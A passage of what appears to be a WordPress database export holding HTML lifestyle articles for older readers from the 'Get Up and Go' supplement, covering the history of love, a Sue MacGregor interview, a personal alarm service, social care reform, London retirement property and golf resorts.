class=\"woo-sc-hr\"></div>&#13;\n<p></p><div><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=120714095934-db01016b7c064659a9deaabfc5ccb30c&amp;docName=guagjulyfinal&amp;username=sachagreen&amp;loadingInfoText=GUAG%20July&amp;showFlipBtn=true&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=120714095934-db01016b7c064659a9deaabfc5ccb30c&amp;docName=guagjulyfinal&amp;username=sachagreen&amp;loadingInfoText=GUAG%20July&amp;showFlipBtn=true&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object><div style=\"width:610px;text-align:left;\"><a href=\"/sachagreen/docs/guagjulyfinal_mode_embed_amp_layout_http_3A_2F_2Fskin.issuu.com_2Fv_2Flight_2Flayout.xml\" target=\"_blank\">Open publication</a> - Free <a href=\"http://issuu.com/\" target=\"_blank\">publishing</a> - <a href=\"http://issuu.com/search?q=final\" target=\"_blank\">More final</a></div></div> <div class=\"woo-sc-hr\"></div>&#13;\n<p><a href=\"http://www.ewartshaw.co.uk/financepublications/2012/GUAGJULYFINAL.pdf\" target=\"_blank\"><strong>Downloadable PDF</strong></a> </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Get up and go - July','As distributed in The Sunday Telegraph July 15th In the July edition of Get Up and Go, we explore top golf courses, scope out the best gear and get some','publish','open','open','','get-up-and-go-july','','','2018-04-02 20:05:30','2018-04-02 20:05:30','',0,'http://westonspirit.org.uk/get-up-and-go-july.asp',0,'post','',0),(205,1,'2014-10-29 00:22:19','2014-10-29 00:22:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">20 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> drloriboul\" title=\"Posts by Dr Lori Boul\" rel=\"author\"&gt;Dr Lori Boul</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"History of Love\" st_url=\"http://westonspirit.org.uk/2012/07/history-of-love/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"History of Love\" st_url=\"http://westonspirit.org.uk/2012/07/history-of-love/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"History of Love\" st_url=\"http://westonspirit.org.uk/2012/07/history-of-love/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"History of Love\" st_url=\"http://westonspirit.org.uk/2012/07/history-of-love/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"History of Love\" st_url=\"http://westonspirit.org.uk/2012/07/history-of-love/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Psychology Of Love – Part 2</h4>&#13;\n<p>Countless philosophers, from Plato to Sartre have devoted their writings to describing, exploring and conceptualising love, particularly with regard to our intimate relationships. In the modern Western world, we take for granted the idea that we should be passionately in love with the person we marry or set up home with – yet this hasn’t always been the case.</p>&#13;\n<p>In ancient times love and marriage certainly didn’t go together like a horse and chariot. Our ancestors were very practical and married for property or business. The Greeks called this love Pragma, which was based on a rational shopping list type of love, something like, “You’ve got grapes, I’ve got bottles, so let’s make wine”.</p>&#13;\n<p>This is not to say that they didn’t make whoopee, but the whoopee that they made was believed to be a type of irrational madness, which was not viewed as a good basis for marriage. This madness involved three types of love: Eros was passionate and sexual; Ludus was a type of game playing; and Mania was possessive and dependent.</p>&#13;\n<p>Both the practical contracts of marriage and the madness of lovers were physically intimate relationships. But the Greeks also had two words that described love in non-physical relationships. Storge was used to explain the close companionate love of friends. However, the most revered type of love in ancient Greece was Agape, which was selfless and altruistic – the type that we would attribute to people such as Mother Teresa.</p>&#13;\n<p>These attitudes to love and marriage continued until the Middle Ages when latter-day French PR executives, called troubadours, began to promote the notion of ‘romantic love’. These wandering minstrels and poets spread tales of knights and maidens and great feats of ‘love’, often unrequited, which spread the emotional game of love throughout the Europe.</p>&#13;\n<p>While people still tended to marry for practical reasons the idea of love as Pragma was fading along with the love of friends (Storge) and selfless love (Agape). The fated, uncontrollable love of star-crossed lovers consumed with passion (Eros, Ludus and Mania) was taking over. By the 1800s Valentine Cards were in mass production and by the early 1900s the moving pictures had joined purveyors of romantic mythology to successfully shape cultural beliefs and firmly fixing the idea of ‘romantic love’ in the human psyche.</p>&#13;\n<p>Although we might accept that there are different types of love, unlike our ancestors, we persist in searching for that one special someone, based on fantasies of romance. Our romantic notions encourage us to expect to find someone who has all the qualities of the noble spiritual Agape and the sexual passion of Eros, who will provide the deep friendship of Storge as well as the fun and games of Ludus, the material benefits of Pragma, with just a touch of Mania providing a little dependency on our love. It would appear that, like the Freddy Mercury song, we ‘want it all’. Unfortunately, most of us have found that there really aren’t too many sane men prancing around in capes with a large ‘S’ on their t-shirts, or women in high heels and suspenders who will run around and make us chicken soup when we’re ill.</p>&#13;\n<p>Modern researchers have attempted to define love, but their research tends to ignore the practical aspects of Pragma (probably because no one wants to admit they marry for money) and the high ideals of Agape (no doubt Saints are too hard to find). Instead they focus on love in companionate and passionate relationships.</p>&#13;\n<h5>In Blog 3: Vive la difference: Men and Women. <div class=\"woo-sc-hr\"></div></h5>&#13;\n<p><em><strong><img class=\"alignright  wp-image-2527\" title=\"Dr Lori Boul\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Dr-Lori-Boul1.jpg\" alt=\"\" width=\"144\" height=\"198\" /><a href=\"http://www.drloriboul.com/\" target=\"_blank\">Dr. Lori Boul</a></strong> </em>gained her PhD at the University of Sheffield in the UK and the research for her thesis, into ‘male menopause’, attracted worldwide media attention. Dr Lori is probably one of the most outspoken speakers on the topic of human sexuality and in writing her book <a href=\"http://www.howtobooks.co.uk/display.asp?K=9781845284749&amp;sf_01=CAUTHOR&amp;sort=SORT%5FTITLE&amp;st_02=diy+sex&amp;sf_02=CTITLE&amp;sf_03=KEYWORD&amp;sf_04=identifier&amp;m=1&amp;dc=1\" target=\"_blank\"><strong><em>DIY Sex and Relationship Therapy</em> </strong></a>has dared to challenge the need for face-to-face therapy. According to Dr Lori, “Good therapists can be hard to find and for many people a good spoonful of common sense is all that is needed”.</p>&#13;\n<p>Whether speaking to the general public or professionals, Dr Lori’s expertise, sensitivity and humour inspire new ways of thinking about relationships, sex and psychology. She has presented talks at national and international conferences, provides training courses and executive mentoring, and is featured as a regular guest speaker with Cunard.</p>&#13;\n<h5><em><a href=\"http://www.drloriboul.com/\" target=\"_blank\">www.drloriboul.com</a>  <div class=\"woo-sc-hr\"></div></em></h5>&#13;\n									</div>','History of Love','History of Love, dr lori boul, diy sex and relationship therapy, love is, male menopause, human sexuality','publish','open','open','','history-of-love','','','2018-04-02 20:05:28','2018-04-02 20:05:28','',0,'http://westonspirit.org.uk/history-of-love.asp',0,'post','',0),(206,1,'2016-06-02 08:02:00','2016-06-02 08:02:00','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"I couldn’t live without…my faithful filofax\" st_url=\"http://westonspirit.org.uk/2012/07/i-couldnt-live-withoutmy-faithful-filofax/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"I couldn’t live without…my faithful filofax\" st_url=\"http://westonspirit.org.uk/2012/07/i-couldnt-live-withoutmy-faithful-filofax/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"I couldn’t live without…my faithful filofax\" st_url=\"http://westonspirit.org.uk/2012/07/i-couldnt-live-withoutmy-faithful-filofax/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"I couldn’t live without…my faithful filofax\" st_url=\"http://westonspirit.org.uk/2012/07/i-couldnt-live-withoutmy-faithful-filofax/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"I couldn’t live without…my faithful filofax\" st_url=\"http://westonspirit.org.uk/2012/07/i-couldnt-live-withoutmy-faithful-filofax/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>So is your Filofax an 80s fashion statement?</h4>&#13;\n<p>I certainly like it as an object, even though it’s really battered. Some of the London phone numbers in it don’t have a prefix so it actually dates from the 70s. I was back in Britain having been brought up in South Africa and working at the BBC, moving from news to Woman’s Hour.</p>&#13;\n<div id=\"attachment_2663\" style=\"width: 606px\" class=\"wp-caption alignright\"><img class=\"size-full wp-image-2663\" title=\"Sue MacGregor\'s filofax - p3\" src=\"/wp-content/uploads/2012/07/Sue-MacGregors-filofax-p3.jpg\" alt=\"\" width=\"596\" height=\"398\" srcset=\"../../../wp-content/uploads/2012/07/Sue-MacGregors-filofax-p3.jpg 596w\" sizes=\"(max-width: 596px) 100vw, 596px\" /><p class=\"wp-caption-text\">“I once left it behind at a hotel and<br />nearly had a heart attack”</p></div>&#13;\n<p>There was so much going on but they were very different times. I remember BBC bosses could be fussy about what you wore. One day, Susannah Simons, a studio manager, was told she couldn’t wear trousers to work so she took hers off and operated for the rest of the day just wearing her long jacket. Another female friend once got bawled out by the then head of Radio 4 for walking through reception at Broadcasting House with plastic bags after shopping during her lunch-hour.</p>&#13;\n<h3>If your Filofax fell into enemy hands, what would they learn about you?</h3>&#13;\n<p>Nothing bad; there are some famous names and addresses in there – politicians, actors, TV and radio people. As a semi-retired broadcaster, every day is different and there’s a lot of crossing out . . . most of which even I can’t read. I did once leave it behind in a drawer at a skiing hotel and nearly had a heart attack. I had to wait a week before it was returned to me in a Jiffy bag.</p>&#13;\n<h3>Only a very few people still use them. Where have all the others gone . . . into a Filofax landfill?</h3>&#13;\n<p>What a lovely thought. Do people throw them away? They are long lasting. The leather on mine is battered but very serviceable, the paper is still of a decent quality and the alphabetical dividers still legible.</p>&#13;\n<h3>Is The Reunion an emotional programme to make?</h3>&#13;\n<p>In the last series we did a programme on HMS Sheffield. On the face of it, we think we’ve heard the Falklands survivors’ stories so many times but the five people we reunited from the crew were so different from each other it was incredibly moving. When I do a programme touching on a tricky subject, professionalism takes over but when I listened back to this one on air, I blubbed three times.</p>&#13;\n<p>When we did the Barings Bank collapse, Nick Leeson [the rogue trader responsible for the 1995 debacle] had not met his old boss since the day he was sacked. The boss was worried about appearing but we’re not a confrontational programme. We don’t put people on the rack.</p>&#13;\n<h3>Have you been to reunions of your own?</h3>&#13;\n<p>I attended the 40th anniversary for my old school in South Africa. One woman looked just as she had at 17. I don’t know what was in the water but she hadn’t had any work done.</p>&#13;\n<p>I also went to secretarial college for six months.</p>&#13;\n<p>My mother insisted I went so I demanded to go to one in Oxford because it was the nearest I would get to the dreaming spires. As soon as I got there it moved to Winchester, which was a tremendous blow. </p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong><img class=\"alignright  wp-image-2665\" title=\"BBC Radio 4 Presenters\" src=\"/wp-content/uploads/2012/07/MacGregor-p3.jpg\" alt=\"\" width=\"108\" height=\"110\" />Sue MacGregor</strong></em>, 70, presents <em>Radio 4’s The Reunion</em>, which returns on Sunday 19 August at 11.15am. </p><div class=\"woo-sc-hr\"></div>&#13;\n<p> </p>&#13;\n									</div>','I couldn’t live without…my faithful filofax','So is your Filofax an 80s fashion statement?, sue macgregor, filofax, radio 4, womans hour, the reunion','publish','open','open','','i-couldnt-live-withoutmy-faithful-filofax','','','2018-04-02 20:05:27','2018-04-02 20:05:27','',0,'http://westonspirit.org.uk/i-couldnt-live-withoutmy-faithful-filofax.asp',0,'post','',0),(207,1,'2017-02-16 18:18:13','2017-02-16 18:18:13','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"It’s official – we are living longer\" st_url=\"http://westonspirit.org.uk/2012/07/its-official-we-are-living-longer/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"It’s official – we are living longer\" st_url=\"http://westonspirit.org.uk/2012/07/its-official-we-are-living-longer/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"It’s official – we are living longer\" st_url=\"http://westonspirit.org.uk/2012/07/its-official-we-are-living-longer/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"It’s official – we are living longer\" st_url=\"http://westonspirit.org.uk/2012/07/its-official-we-are-living-longer/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"It’s official – we are living longer\" st_url=\"http://westonspirit.org.uk/2012/07/its-official-we-are-living-longer/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Getting older also means getting wiser – especially about health and safety. Now, with a new portable device available, it’s easier than ever</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2780\" title=\"callsafe\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/callsafe.jpg\" alt=\"\" width=\"596\" height=\"460\" />It’s official! Not only are we all now living longer but we are healthier for longer too. The Office for National Statistics (ONS) revealed in October that the number of centenarians in the UK has increased fivefold in the last 30 years. The seismic change in life expectancy is fantastic news. Many of those in the earlier years of retirement are fitter than ever before – it’s worth planning and taking a ‘gap year for grownups’ just to witness the look of sheer amazement on the faces of our offspring and the grandchildren as rucksacks are packed along with our micro-chipped passports. But while this is great news for all of us who rocked the 60s and boogied through the 70s, it also presents challenges, especially when we choose the comfort of hotels rather than hostels.</p>&#13;\n<p>Older people now make up 72 per cent of all social services clients. As our population ages, it is more important than ever that social care gives older people choice and control over services that help them to remain independent. As expected, the cost of providing residential care in later life has grown year on year, which can put additional strain on the NHS and financial pressure on the government, whichever party is in office. But, with a little help and monitoring, more of us are able to stay safe and secure within the privacy and familiarity of our own home. It is central government policy to improve independence, choice and promote people’s ability to live at home and, in line with the government’s agenda of promoting the use of telecare to enable people to stay in their own homes for longer, “Johnnie” Johnson Housing Trust, a not-for-profit organisation that provides more than 4,700 homes including retirement housing, has recently launched a smarter new personal alarm service called Astraline callsafe.</p>&#13;\n<p>It is never easy to admit that we aren’t quite as young or fit as we used to be, or indeed still feel, and it is often our nearest and dearest who are the first to remind us (thanks for that!) and perhaps the last thing we want to have in our home is a big white box with a big red button that reminds us of our vulnerability and shouts ‘dependence’. But there maybe occasions when a personal alarm could make a real difference to our way of life should we suddenly feel unwell or have a fall. Astraline have dedicated time to source a more modern design and produced callsafe, a personal alarm system that sits discreetly in the home, often mistaken for a broadband hub – excellent for boosting street credibility.</p>&#13;\n<p>The stylish callsafe alarm unit gives the user and their family peace of mind; the Trust’s response team – located in Astraline, the organisation’s in-house call centre – is available round the clock to provide help and support when it is needed most. The caller’s medical history and details of any specific needs are accessible by the team, enabling them to provide the most appropriate response without delay.</p>&#13;\n<p>The callsafe alarm system works by plugging a radio transmitter/receiver into a phone line, which can then connect with the 24-hour telephone response centre. Each unit also comes with a sleek remote radio button, worn as either a pendant or discreetly on the wrist, which is designed to be worn by the user at all times – throughout the house and even in the garden, meaning users are constantly protected. This service is available from just 46p per day*. </p><div class=\"woo-sc-hr\"></div>&#13;\n<p>More information about the service can be found at <a href=\"http://www.callsafe.org/\" target=\"_blank\">www.callsafe.org</a>, or by ringing the callsafe customer services team on 0845 217 0721.</p>&#13;\n<p>As with all the trust’s services, profits made from callsafe go directly back into improving the lives of residents and their communities.</p>&#13;\n<p>*There is also a small, one-off charge for set up and if required, we can also install the system for you. The 46p per day refers to the monthly monitoring service charge which is paid via Direct Debit. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','It’s official – we are living longer','Getting older also means getting wiser – especially about health and safety. Now, with a new portable device available, it’s easier than ever','publish','open','open','','its-official-we-are-living-longer','','','2018-04-02 20:05:25','2018-04-02 20:05:25','',0,'http://westonspirit.org.uk/its-official-we-are-living-longer.asp',0,'post','',0),(208,1,'2015-12-24 21:27:26','2015-12-24 21:27:26','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"It’s time to update the care system\" st_url=\"http://westonspirit.org.uk/2012/07/its-time-to-update-the-care-system/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"It’s time to update the care system\" st_url=\"http://westonspirit.org.uk/2012/07/its-time-to-update-the-care-system/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"It’s time to update the care system\" st_url=\"http://westonspirit.org.uk/2012/07/its-time-to-update-the-care-system/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"It’s time to update the care system\" st_url=\"http://westonspirit.org.uk/2012/07/its-time-to-update-the-care-system/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"It’s time to update the care system\" st_url=\"http://westonspirit.org.uk/2012/07/its-time-to-update-the-care-system/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Policy makers so far haven’t put adult social care anywhere near the top of the agenda and the older generation’s patience is running out.</h4>&#13;\n<div id=\"attachment_2692\" class=\"wp-caption alignright\" style=\"width: 154px\"><img class=\" wp-image-2692  \" title=\"Campaign - p6\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Campaign-p6.jpg\" alt=\"\" width=\"144\" height=\"222\" /><p class=\"wp-caption-text\">Older people feel let down by politicians, a survey finds</p></div>&#13;\n<p>A whole year has passed since Andrew Dilnot published his detailed report on social care funding but ministers have finally responded. Last week, the white paper on tackling the care crisis in England was released.</p>&#13;\n<p>Sadly, it is not the action plan we, or Mr Dilnot, had hoped for.</p>&#13;\n<p>There is some good news in that Dilnot’s calls for investment in more integrated services, an increase in the number of adequate sheltered housing units for older people, and a national minimum eligibility threshold for access to free social care have been accepted.</p>&#13;\n<p>Yet the first of these pivotal decisions won’t be implemented until 2014 at the earliest. In the interim, those  in need of care are stuck with the current system.</p>&#13;\n<p>On the critical issue of funding, the government has accepted Dilnot’s proposals ‘in principle’ to introduce a cap on the amount people have to pay for their care. But decisions on the level of this cap, and how it should be paid for, are for discussion at a later date.</p>&#13;\n<p>Even the offer of universal deferred payments – whereby people can take out loans to pay for their care to be paid off from their estate after they die – is something of a wolf in sheep’s clothing. Without a cap on individuals’ contributions, it still means older people could use up all of their savings on care.</p>&#13;\n<p>Older people have had enough of issues which affect their lives being relegated to the bottom of politicians’ priority list. According to Anchor research (before the white paper was published), more than two thirds of people over 55 believe the coalition government has not paid enough attention to social care and only 14 per cent were confident that the government would find a solution to the many failures which blight the system.</p>&#13;\n<p>But it is not just this administration which is at fault. Less than a third of older people believe the social care system would have fared better under a different government.</p>&#13;\n<p>The lack of commitment to reform is problematic for those of us who work in the sector but the implications are greater for older people struggling with a complex and outdated care system.</p>&#13;\n<p>The time really has come to take action.</p>&#13;\n<p>Last month, MPs showed their support for Anchor’s Grey Pride campaign, backing a motion calling on the government to consider appointing a Minister for Older People. It is a momentous move in setting older people’s issues firmly on the government agenda. Had a dedicated minister already existed to push decisions forward, perhaps the wait for social care funding reform would not have exceeded a year.</p>&#13;\n<p>Many of the 137,000 people who also backed Anchor’s call for a dedicated minister cited social care as a key issue. Under the current system, two fifths of older people are worried that they will have to turn to family members for help with social care costs but most doubt their family will have the necessary funds. With an ageing population, this is a huge concernt.</p>&#13;\n<p>It is crucial that the many unanswered questions following the white paper – most importantly, how care will be paid for – are answered urgently. </p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em>Jane Ashcroft</em> </strong>is CEO of Anchor, England’s largest not-for-profit provider of housing and care to older people. </p><div class=\"woo-sc-hr\"></div> &#13;\n									</div>','It’s time to update the care system','Policymakers so far haven’t put adult social care anywhere near the top of the agenda and the older generation’s patience is running out., anchors grey pride parade, jane ashcroft, andrew dilnot, social care funding, featured','publish','open','open','','its-time-to-update-the-care-system','','','2018-04-02 20:05:24','2018-04-02 20:05:24','',0,'http://westonspirit.org.uk/its-time-to-update-the-care-system.asp',0,'post','',0),(209,1,'2016-05-24 20:23:38','2016-05-24 20:23:38','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gnorwood\" title=\"Posts by Graham Norwood\" rel=\"author\"&gt;Graham Norwood</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Key to the future\" st_url=\"http://westonspirit.org.uk/2012/07/key-to-the-future/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Key to the future\" st_url=\"http://westonspirit.org.uk/2012/07/key-to-the-future/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Key to the future\" st_url=\"http://westonspirit.org.uk/2012/07/key-to-the-future/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Key to the future\" st_url=\"http://westonspirit.org.uk/2012/07/key-to-the-future/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Key to the future\" st_url=\"http://westonspirit.org.uk/2012/07/key-to-the-future/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Don’t fancy a country cottage with roses round the door? Then join the retirees enjoying the high life in London. It could prove a wise investment, too.</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2699\" title=\"London - p7\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/London-p7.jpg\" alt=\"\" width=\"596\" height=\"190\" />There was a time when you got your pension, packed your bag and headed to the country – but not any more.</p>&#13;\n<p>Now many people, especially those who used to work in London, keep a pied-à-terre to enjoy a capital lifestyle despite having a main home outside. And there are clear advantages to staying in the city.</p>&#13;\n<p>First, London’s public transport is very good compared with the rest of the UK and it typically comes with seniors’ discounts. Second, you are close to vital services such as GPs and hospitals as well as facilities including shops, museums, theatres and entertainment spots – again, often with cut-price perks for pensioners. Finally, you will almost certainly have neighbours nearby to provide added peace of mind.</p>&#13;\n<p>Although there are also advantages when it comes to property choice – small apartments ideal for retirees are much more common in London than outside, for example – there is undoubtedly an obstacle to some in the form of high asking prices.</p>&#13;\n<div id=\"attachment_2701\" class=\"wp-caption alignright\" style=\"width: 204px\"><img class=\" wp-image-2701   \" title=\"702091.TIF\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/London2-p7.jpg\" alt=\"\" width=\"194\" height=\"145\" /><p class=\"wp-caption-text\">Small flats in London are ideal for retirees</p></div>&#13;\n<p>Across Greater London as a whole, the average price of a detached house now exceeds £700,000 while an apartment costs almost £350,000. In central London, those prices can very easily double although it is still possible to get a very small studio flat – the classic pied-à-terre for an active retired person or couple – for about £200,000.</p>&#13;\n<p>Estate agents say the favoured locations for retirees are Bloomsbury and Islington close to the centre, followed by south of the river hotspots such as Waterloo, Bromley and Croydon.</p>&#13;\n<p>“The cost of buying a property is very high, but retirees should see it as an investment for the medium-term as well as a lifestyle choice for now,” says buying agent Andrew Hebden.</p>&#13;\n<p>“It allows you to stay in London while there is a very strong chance that it will appreciate in value so can be sold in a few years for a handsome profit.”</p>&#13;\n<p>Certainly London’s market, especially near the centre, has stayed buoyant despite wider economic worries, and few expect that to change soon. For affluent retirees, a base in the capital could be a perfect combination of liberated lifestyle and canny investment. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Key to the future','Don’t fancy a country cottage with roses round the door? Then join the retirees enjoying the high life in London. It could prove a wise investment, too.','publish','open','open','','key-to-the-future','','','2018-04-02 20:05:22','2018-04-02 20:05:22','',0,'http://westonspirit.org.uk/key-to-the-future.asp',0,'post','',0),(210,1,'2015-06-10 01:50:57','2015-06-10 01:50:57','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> dwain\" title=\"Posts by Deborah Wain\" rel=\"author\"&gt;Deborah Wain</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Location, Location…\" st_url=\"http://westonspirit.org.uk/2012/07/location-location/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Location, Location…\" st_url=\"http://westonspirit.org.uk/2012/07/location-location/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Location, Location…\" st_url=\"http://westonspirit.org.uk/2012/07/location-location/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Location, Location…\" st_url=\"http://westonspirit.org.uk/2012/07/location-location/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Location, Location…\" st_url=\"http://westonspirit.org.uk/2012/07/location-location/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Warm weather really is par for the course at the best golfing hotels and resorts</h4>&#13;\n<div id=\"attachment_2729\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-2729\" title=\"Golfer - p8\" src=\"/wp-content/uploads/2012/07/Golfer-p8.jpg\" alt=\"\" width=\"596\" height=\"397\" /><p class=\"wp-caption-text\">Award-winning Desert Springs in Spain suits all types of abilities</p></div>&#13;\n<p>Fancy combining golf with a sunshine holiday? Europe and the US have no end of luxury resorts to choose from, but face increasing competition from Dubai and up-and-coming destinations such as Morocco. And China boasts the world’s biggest golf club, Mission Hills, with 12 18-hole resort and championship courses! Here are our suggestions for a sporting break. </p><div class=\"woo-sc-hr\"></div>&#13;\n<div id=\"attachment_2731\" class=\"wp-caption alignright\" style=\"width: 225px\"><img class=\" wp-image-2731  \" title=\"Location location - champions gate - p9\" src=\"/wp-content/uploads/2012/07/Location-location-champions-gate-p9.jpg\" alt=\"\" width=\"215\" height=\"143\" /><p class=\"wp-caption-text\">ChampionsGate</p></div>&#13;\n<h3>ChampionsGate, Florida</h3>&#13;\n<p>Less than 15 minutes from Walt Disney World, this Orlando golf resort features two 18-hole championship courses. The links-style International Course is designed around scenic natural wetlands and the lush National Course is in a traditional American parkland style.</p>&#13;\n<h5><em><a href=\"http://www.championsgategolf.com/\">www.championsgategolf.com</a> <div class=\"woo-sc-hr\"></div></em></h5>&#13;\n<h3>Quinta do Lago, Algarve</h3>&#13;\n<p>Quinta do Lago is set in nearly 2,000 acres of pine forest and lakes on the southern tip of Portugal and bordered by miles of beautiful sandy beaches. It boasts three championship courses, with Laranjal being awarded the Best Golf Course in Portugal title in 2016.</p>&#13;\n<h5><em><a href=\"http://www.quintadolago.com/\">www.quintadolago.com</a> <div class=\"woo-sc-hr\"></div></em> </h5>&#13;\n<h3>Desert Springs, Spain</h3>&#13;\n<p>The impeccably-maintained golf course at this award-winning award leisure and golf resort in Almeria contrasts sharply with the arid surrounding desert. It was designed by Peter McEvoy to appeal to lesser experienced golfers as well as those with a low handicap.</p>&#13;\n<h5><em><a href=\"http://www.almanzora.com/\" target=\"_blank\">www.almanzora.com</a> <div class=\"woo-sc-hr\"></div></em> </h5>&#13;\n									</div>','Location, Location…','Warm weather really is par for the course at the best golfing hotels and resorts, golf, deborah wain, quinta do lago, championsgate, desert springs, featured','publish','open','open','','location-location','','','2018-04-02 20:05:20','2018-04-02 20:05:20','',0,'http://westonspirit.org.uk/location-location.asp',0,'post','',0),(211,1,'2015-08-16 16:01:22','2015-08-16 16:01:22','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Media watch\" st_url=\"http://westonspirit.org.uk/2012/07/media-watch-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Media watch\" st_url=\"http://westonspirit.org.uk/2012/07/media-watch-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Media watch\" st_url=\"http://westonspirit.org.uk/2012/07/media-watch-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Media watch\" st_url=\"http://westonspirit.org.uk/2012/07/media-watch-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Media watch\" st_url=\"http://westonspirit.org.uk/2012/07/media-watch-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Our pick of age-related stories in the news</h4>&#13;\n<div id=\"attachment_2670\" class=\"wp-caption alignright\" 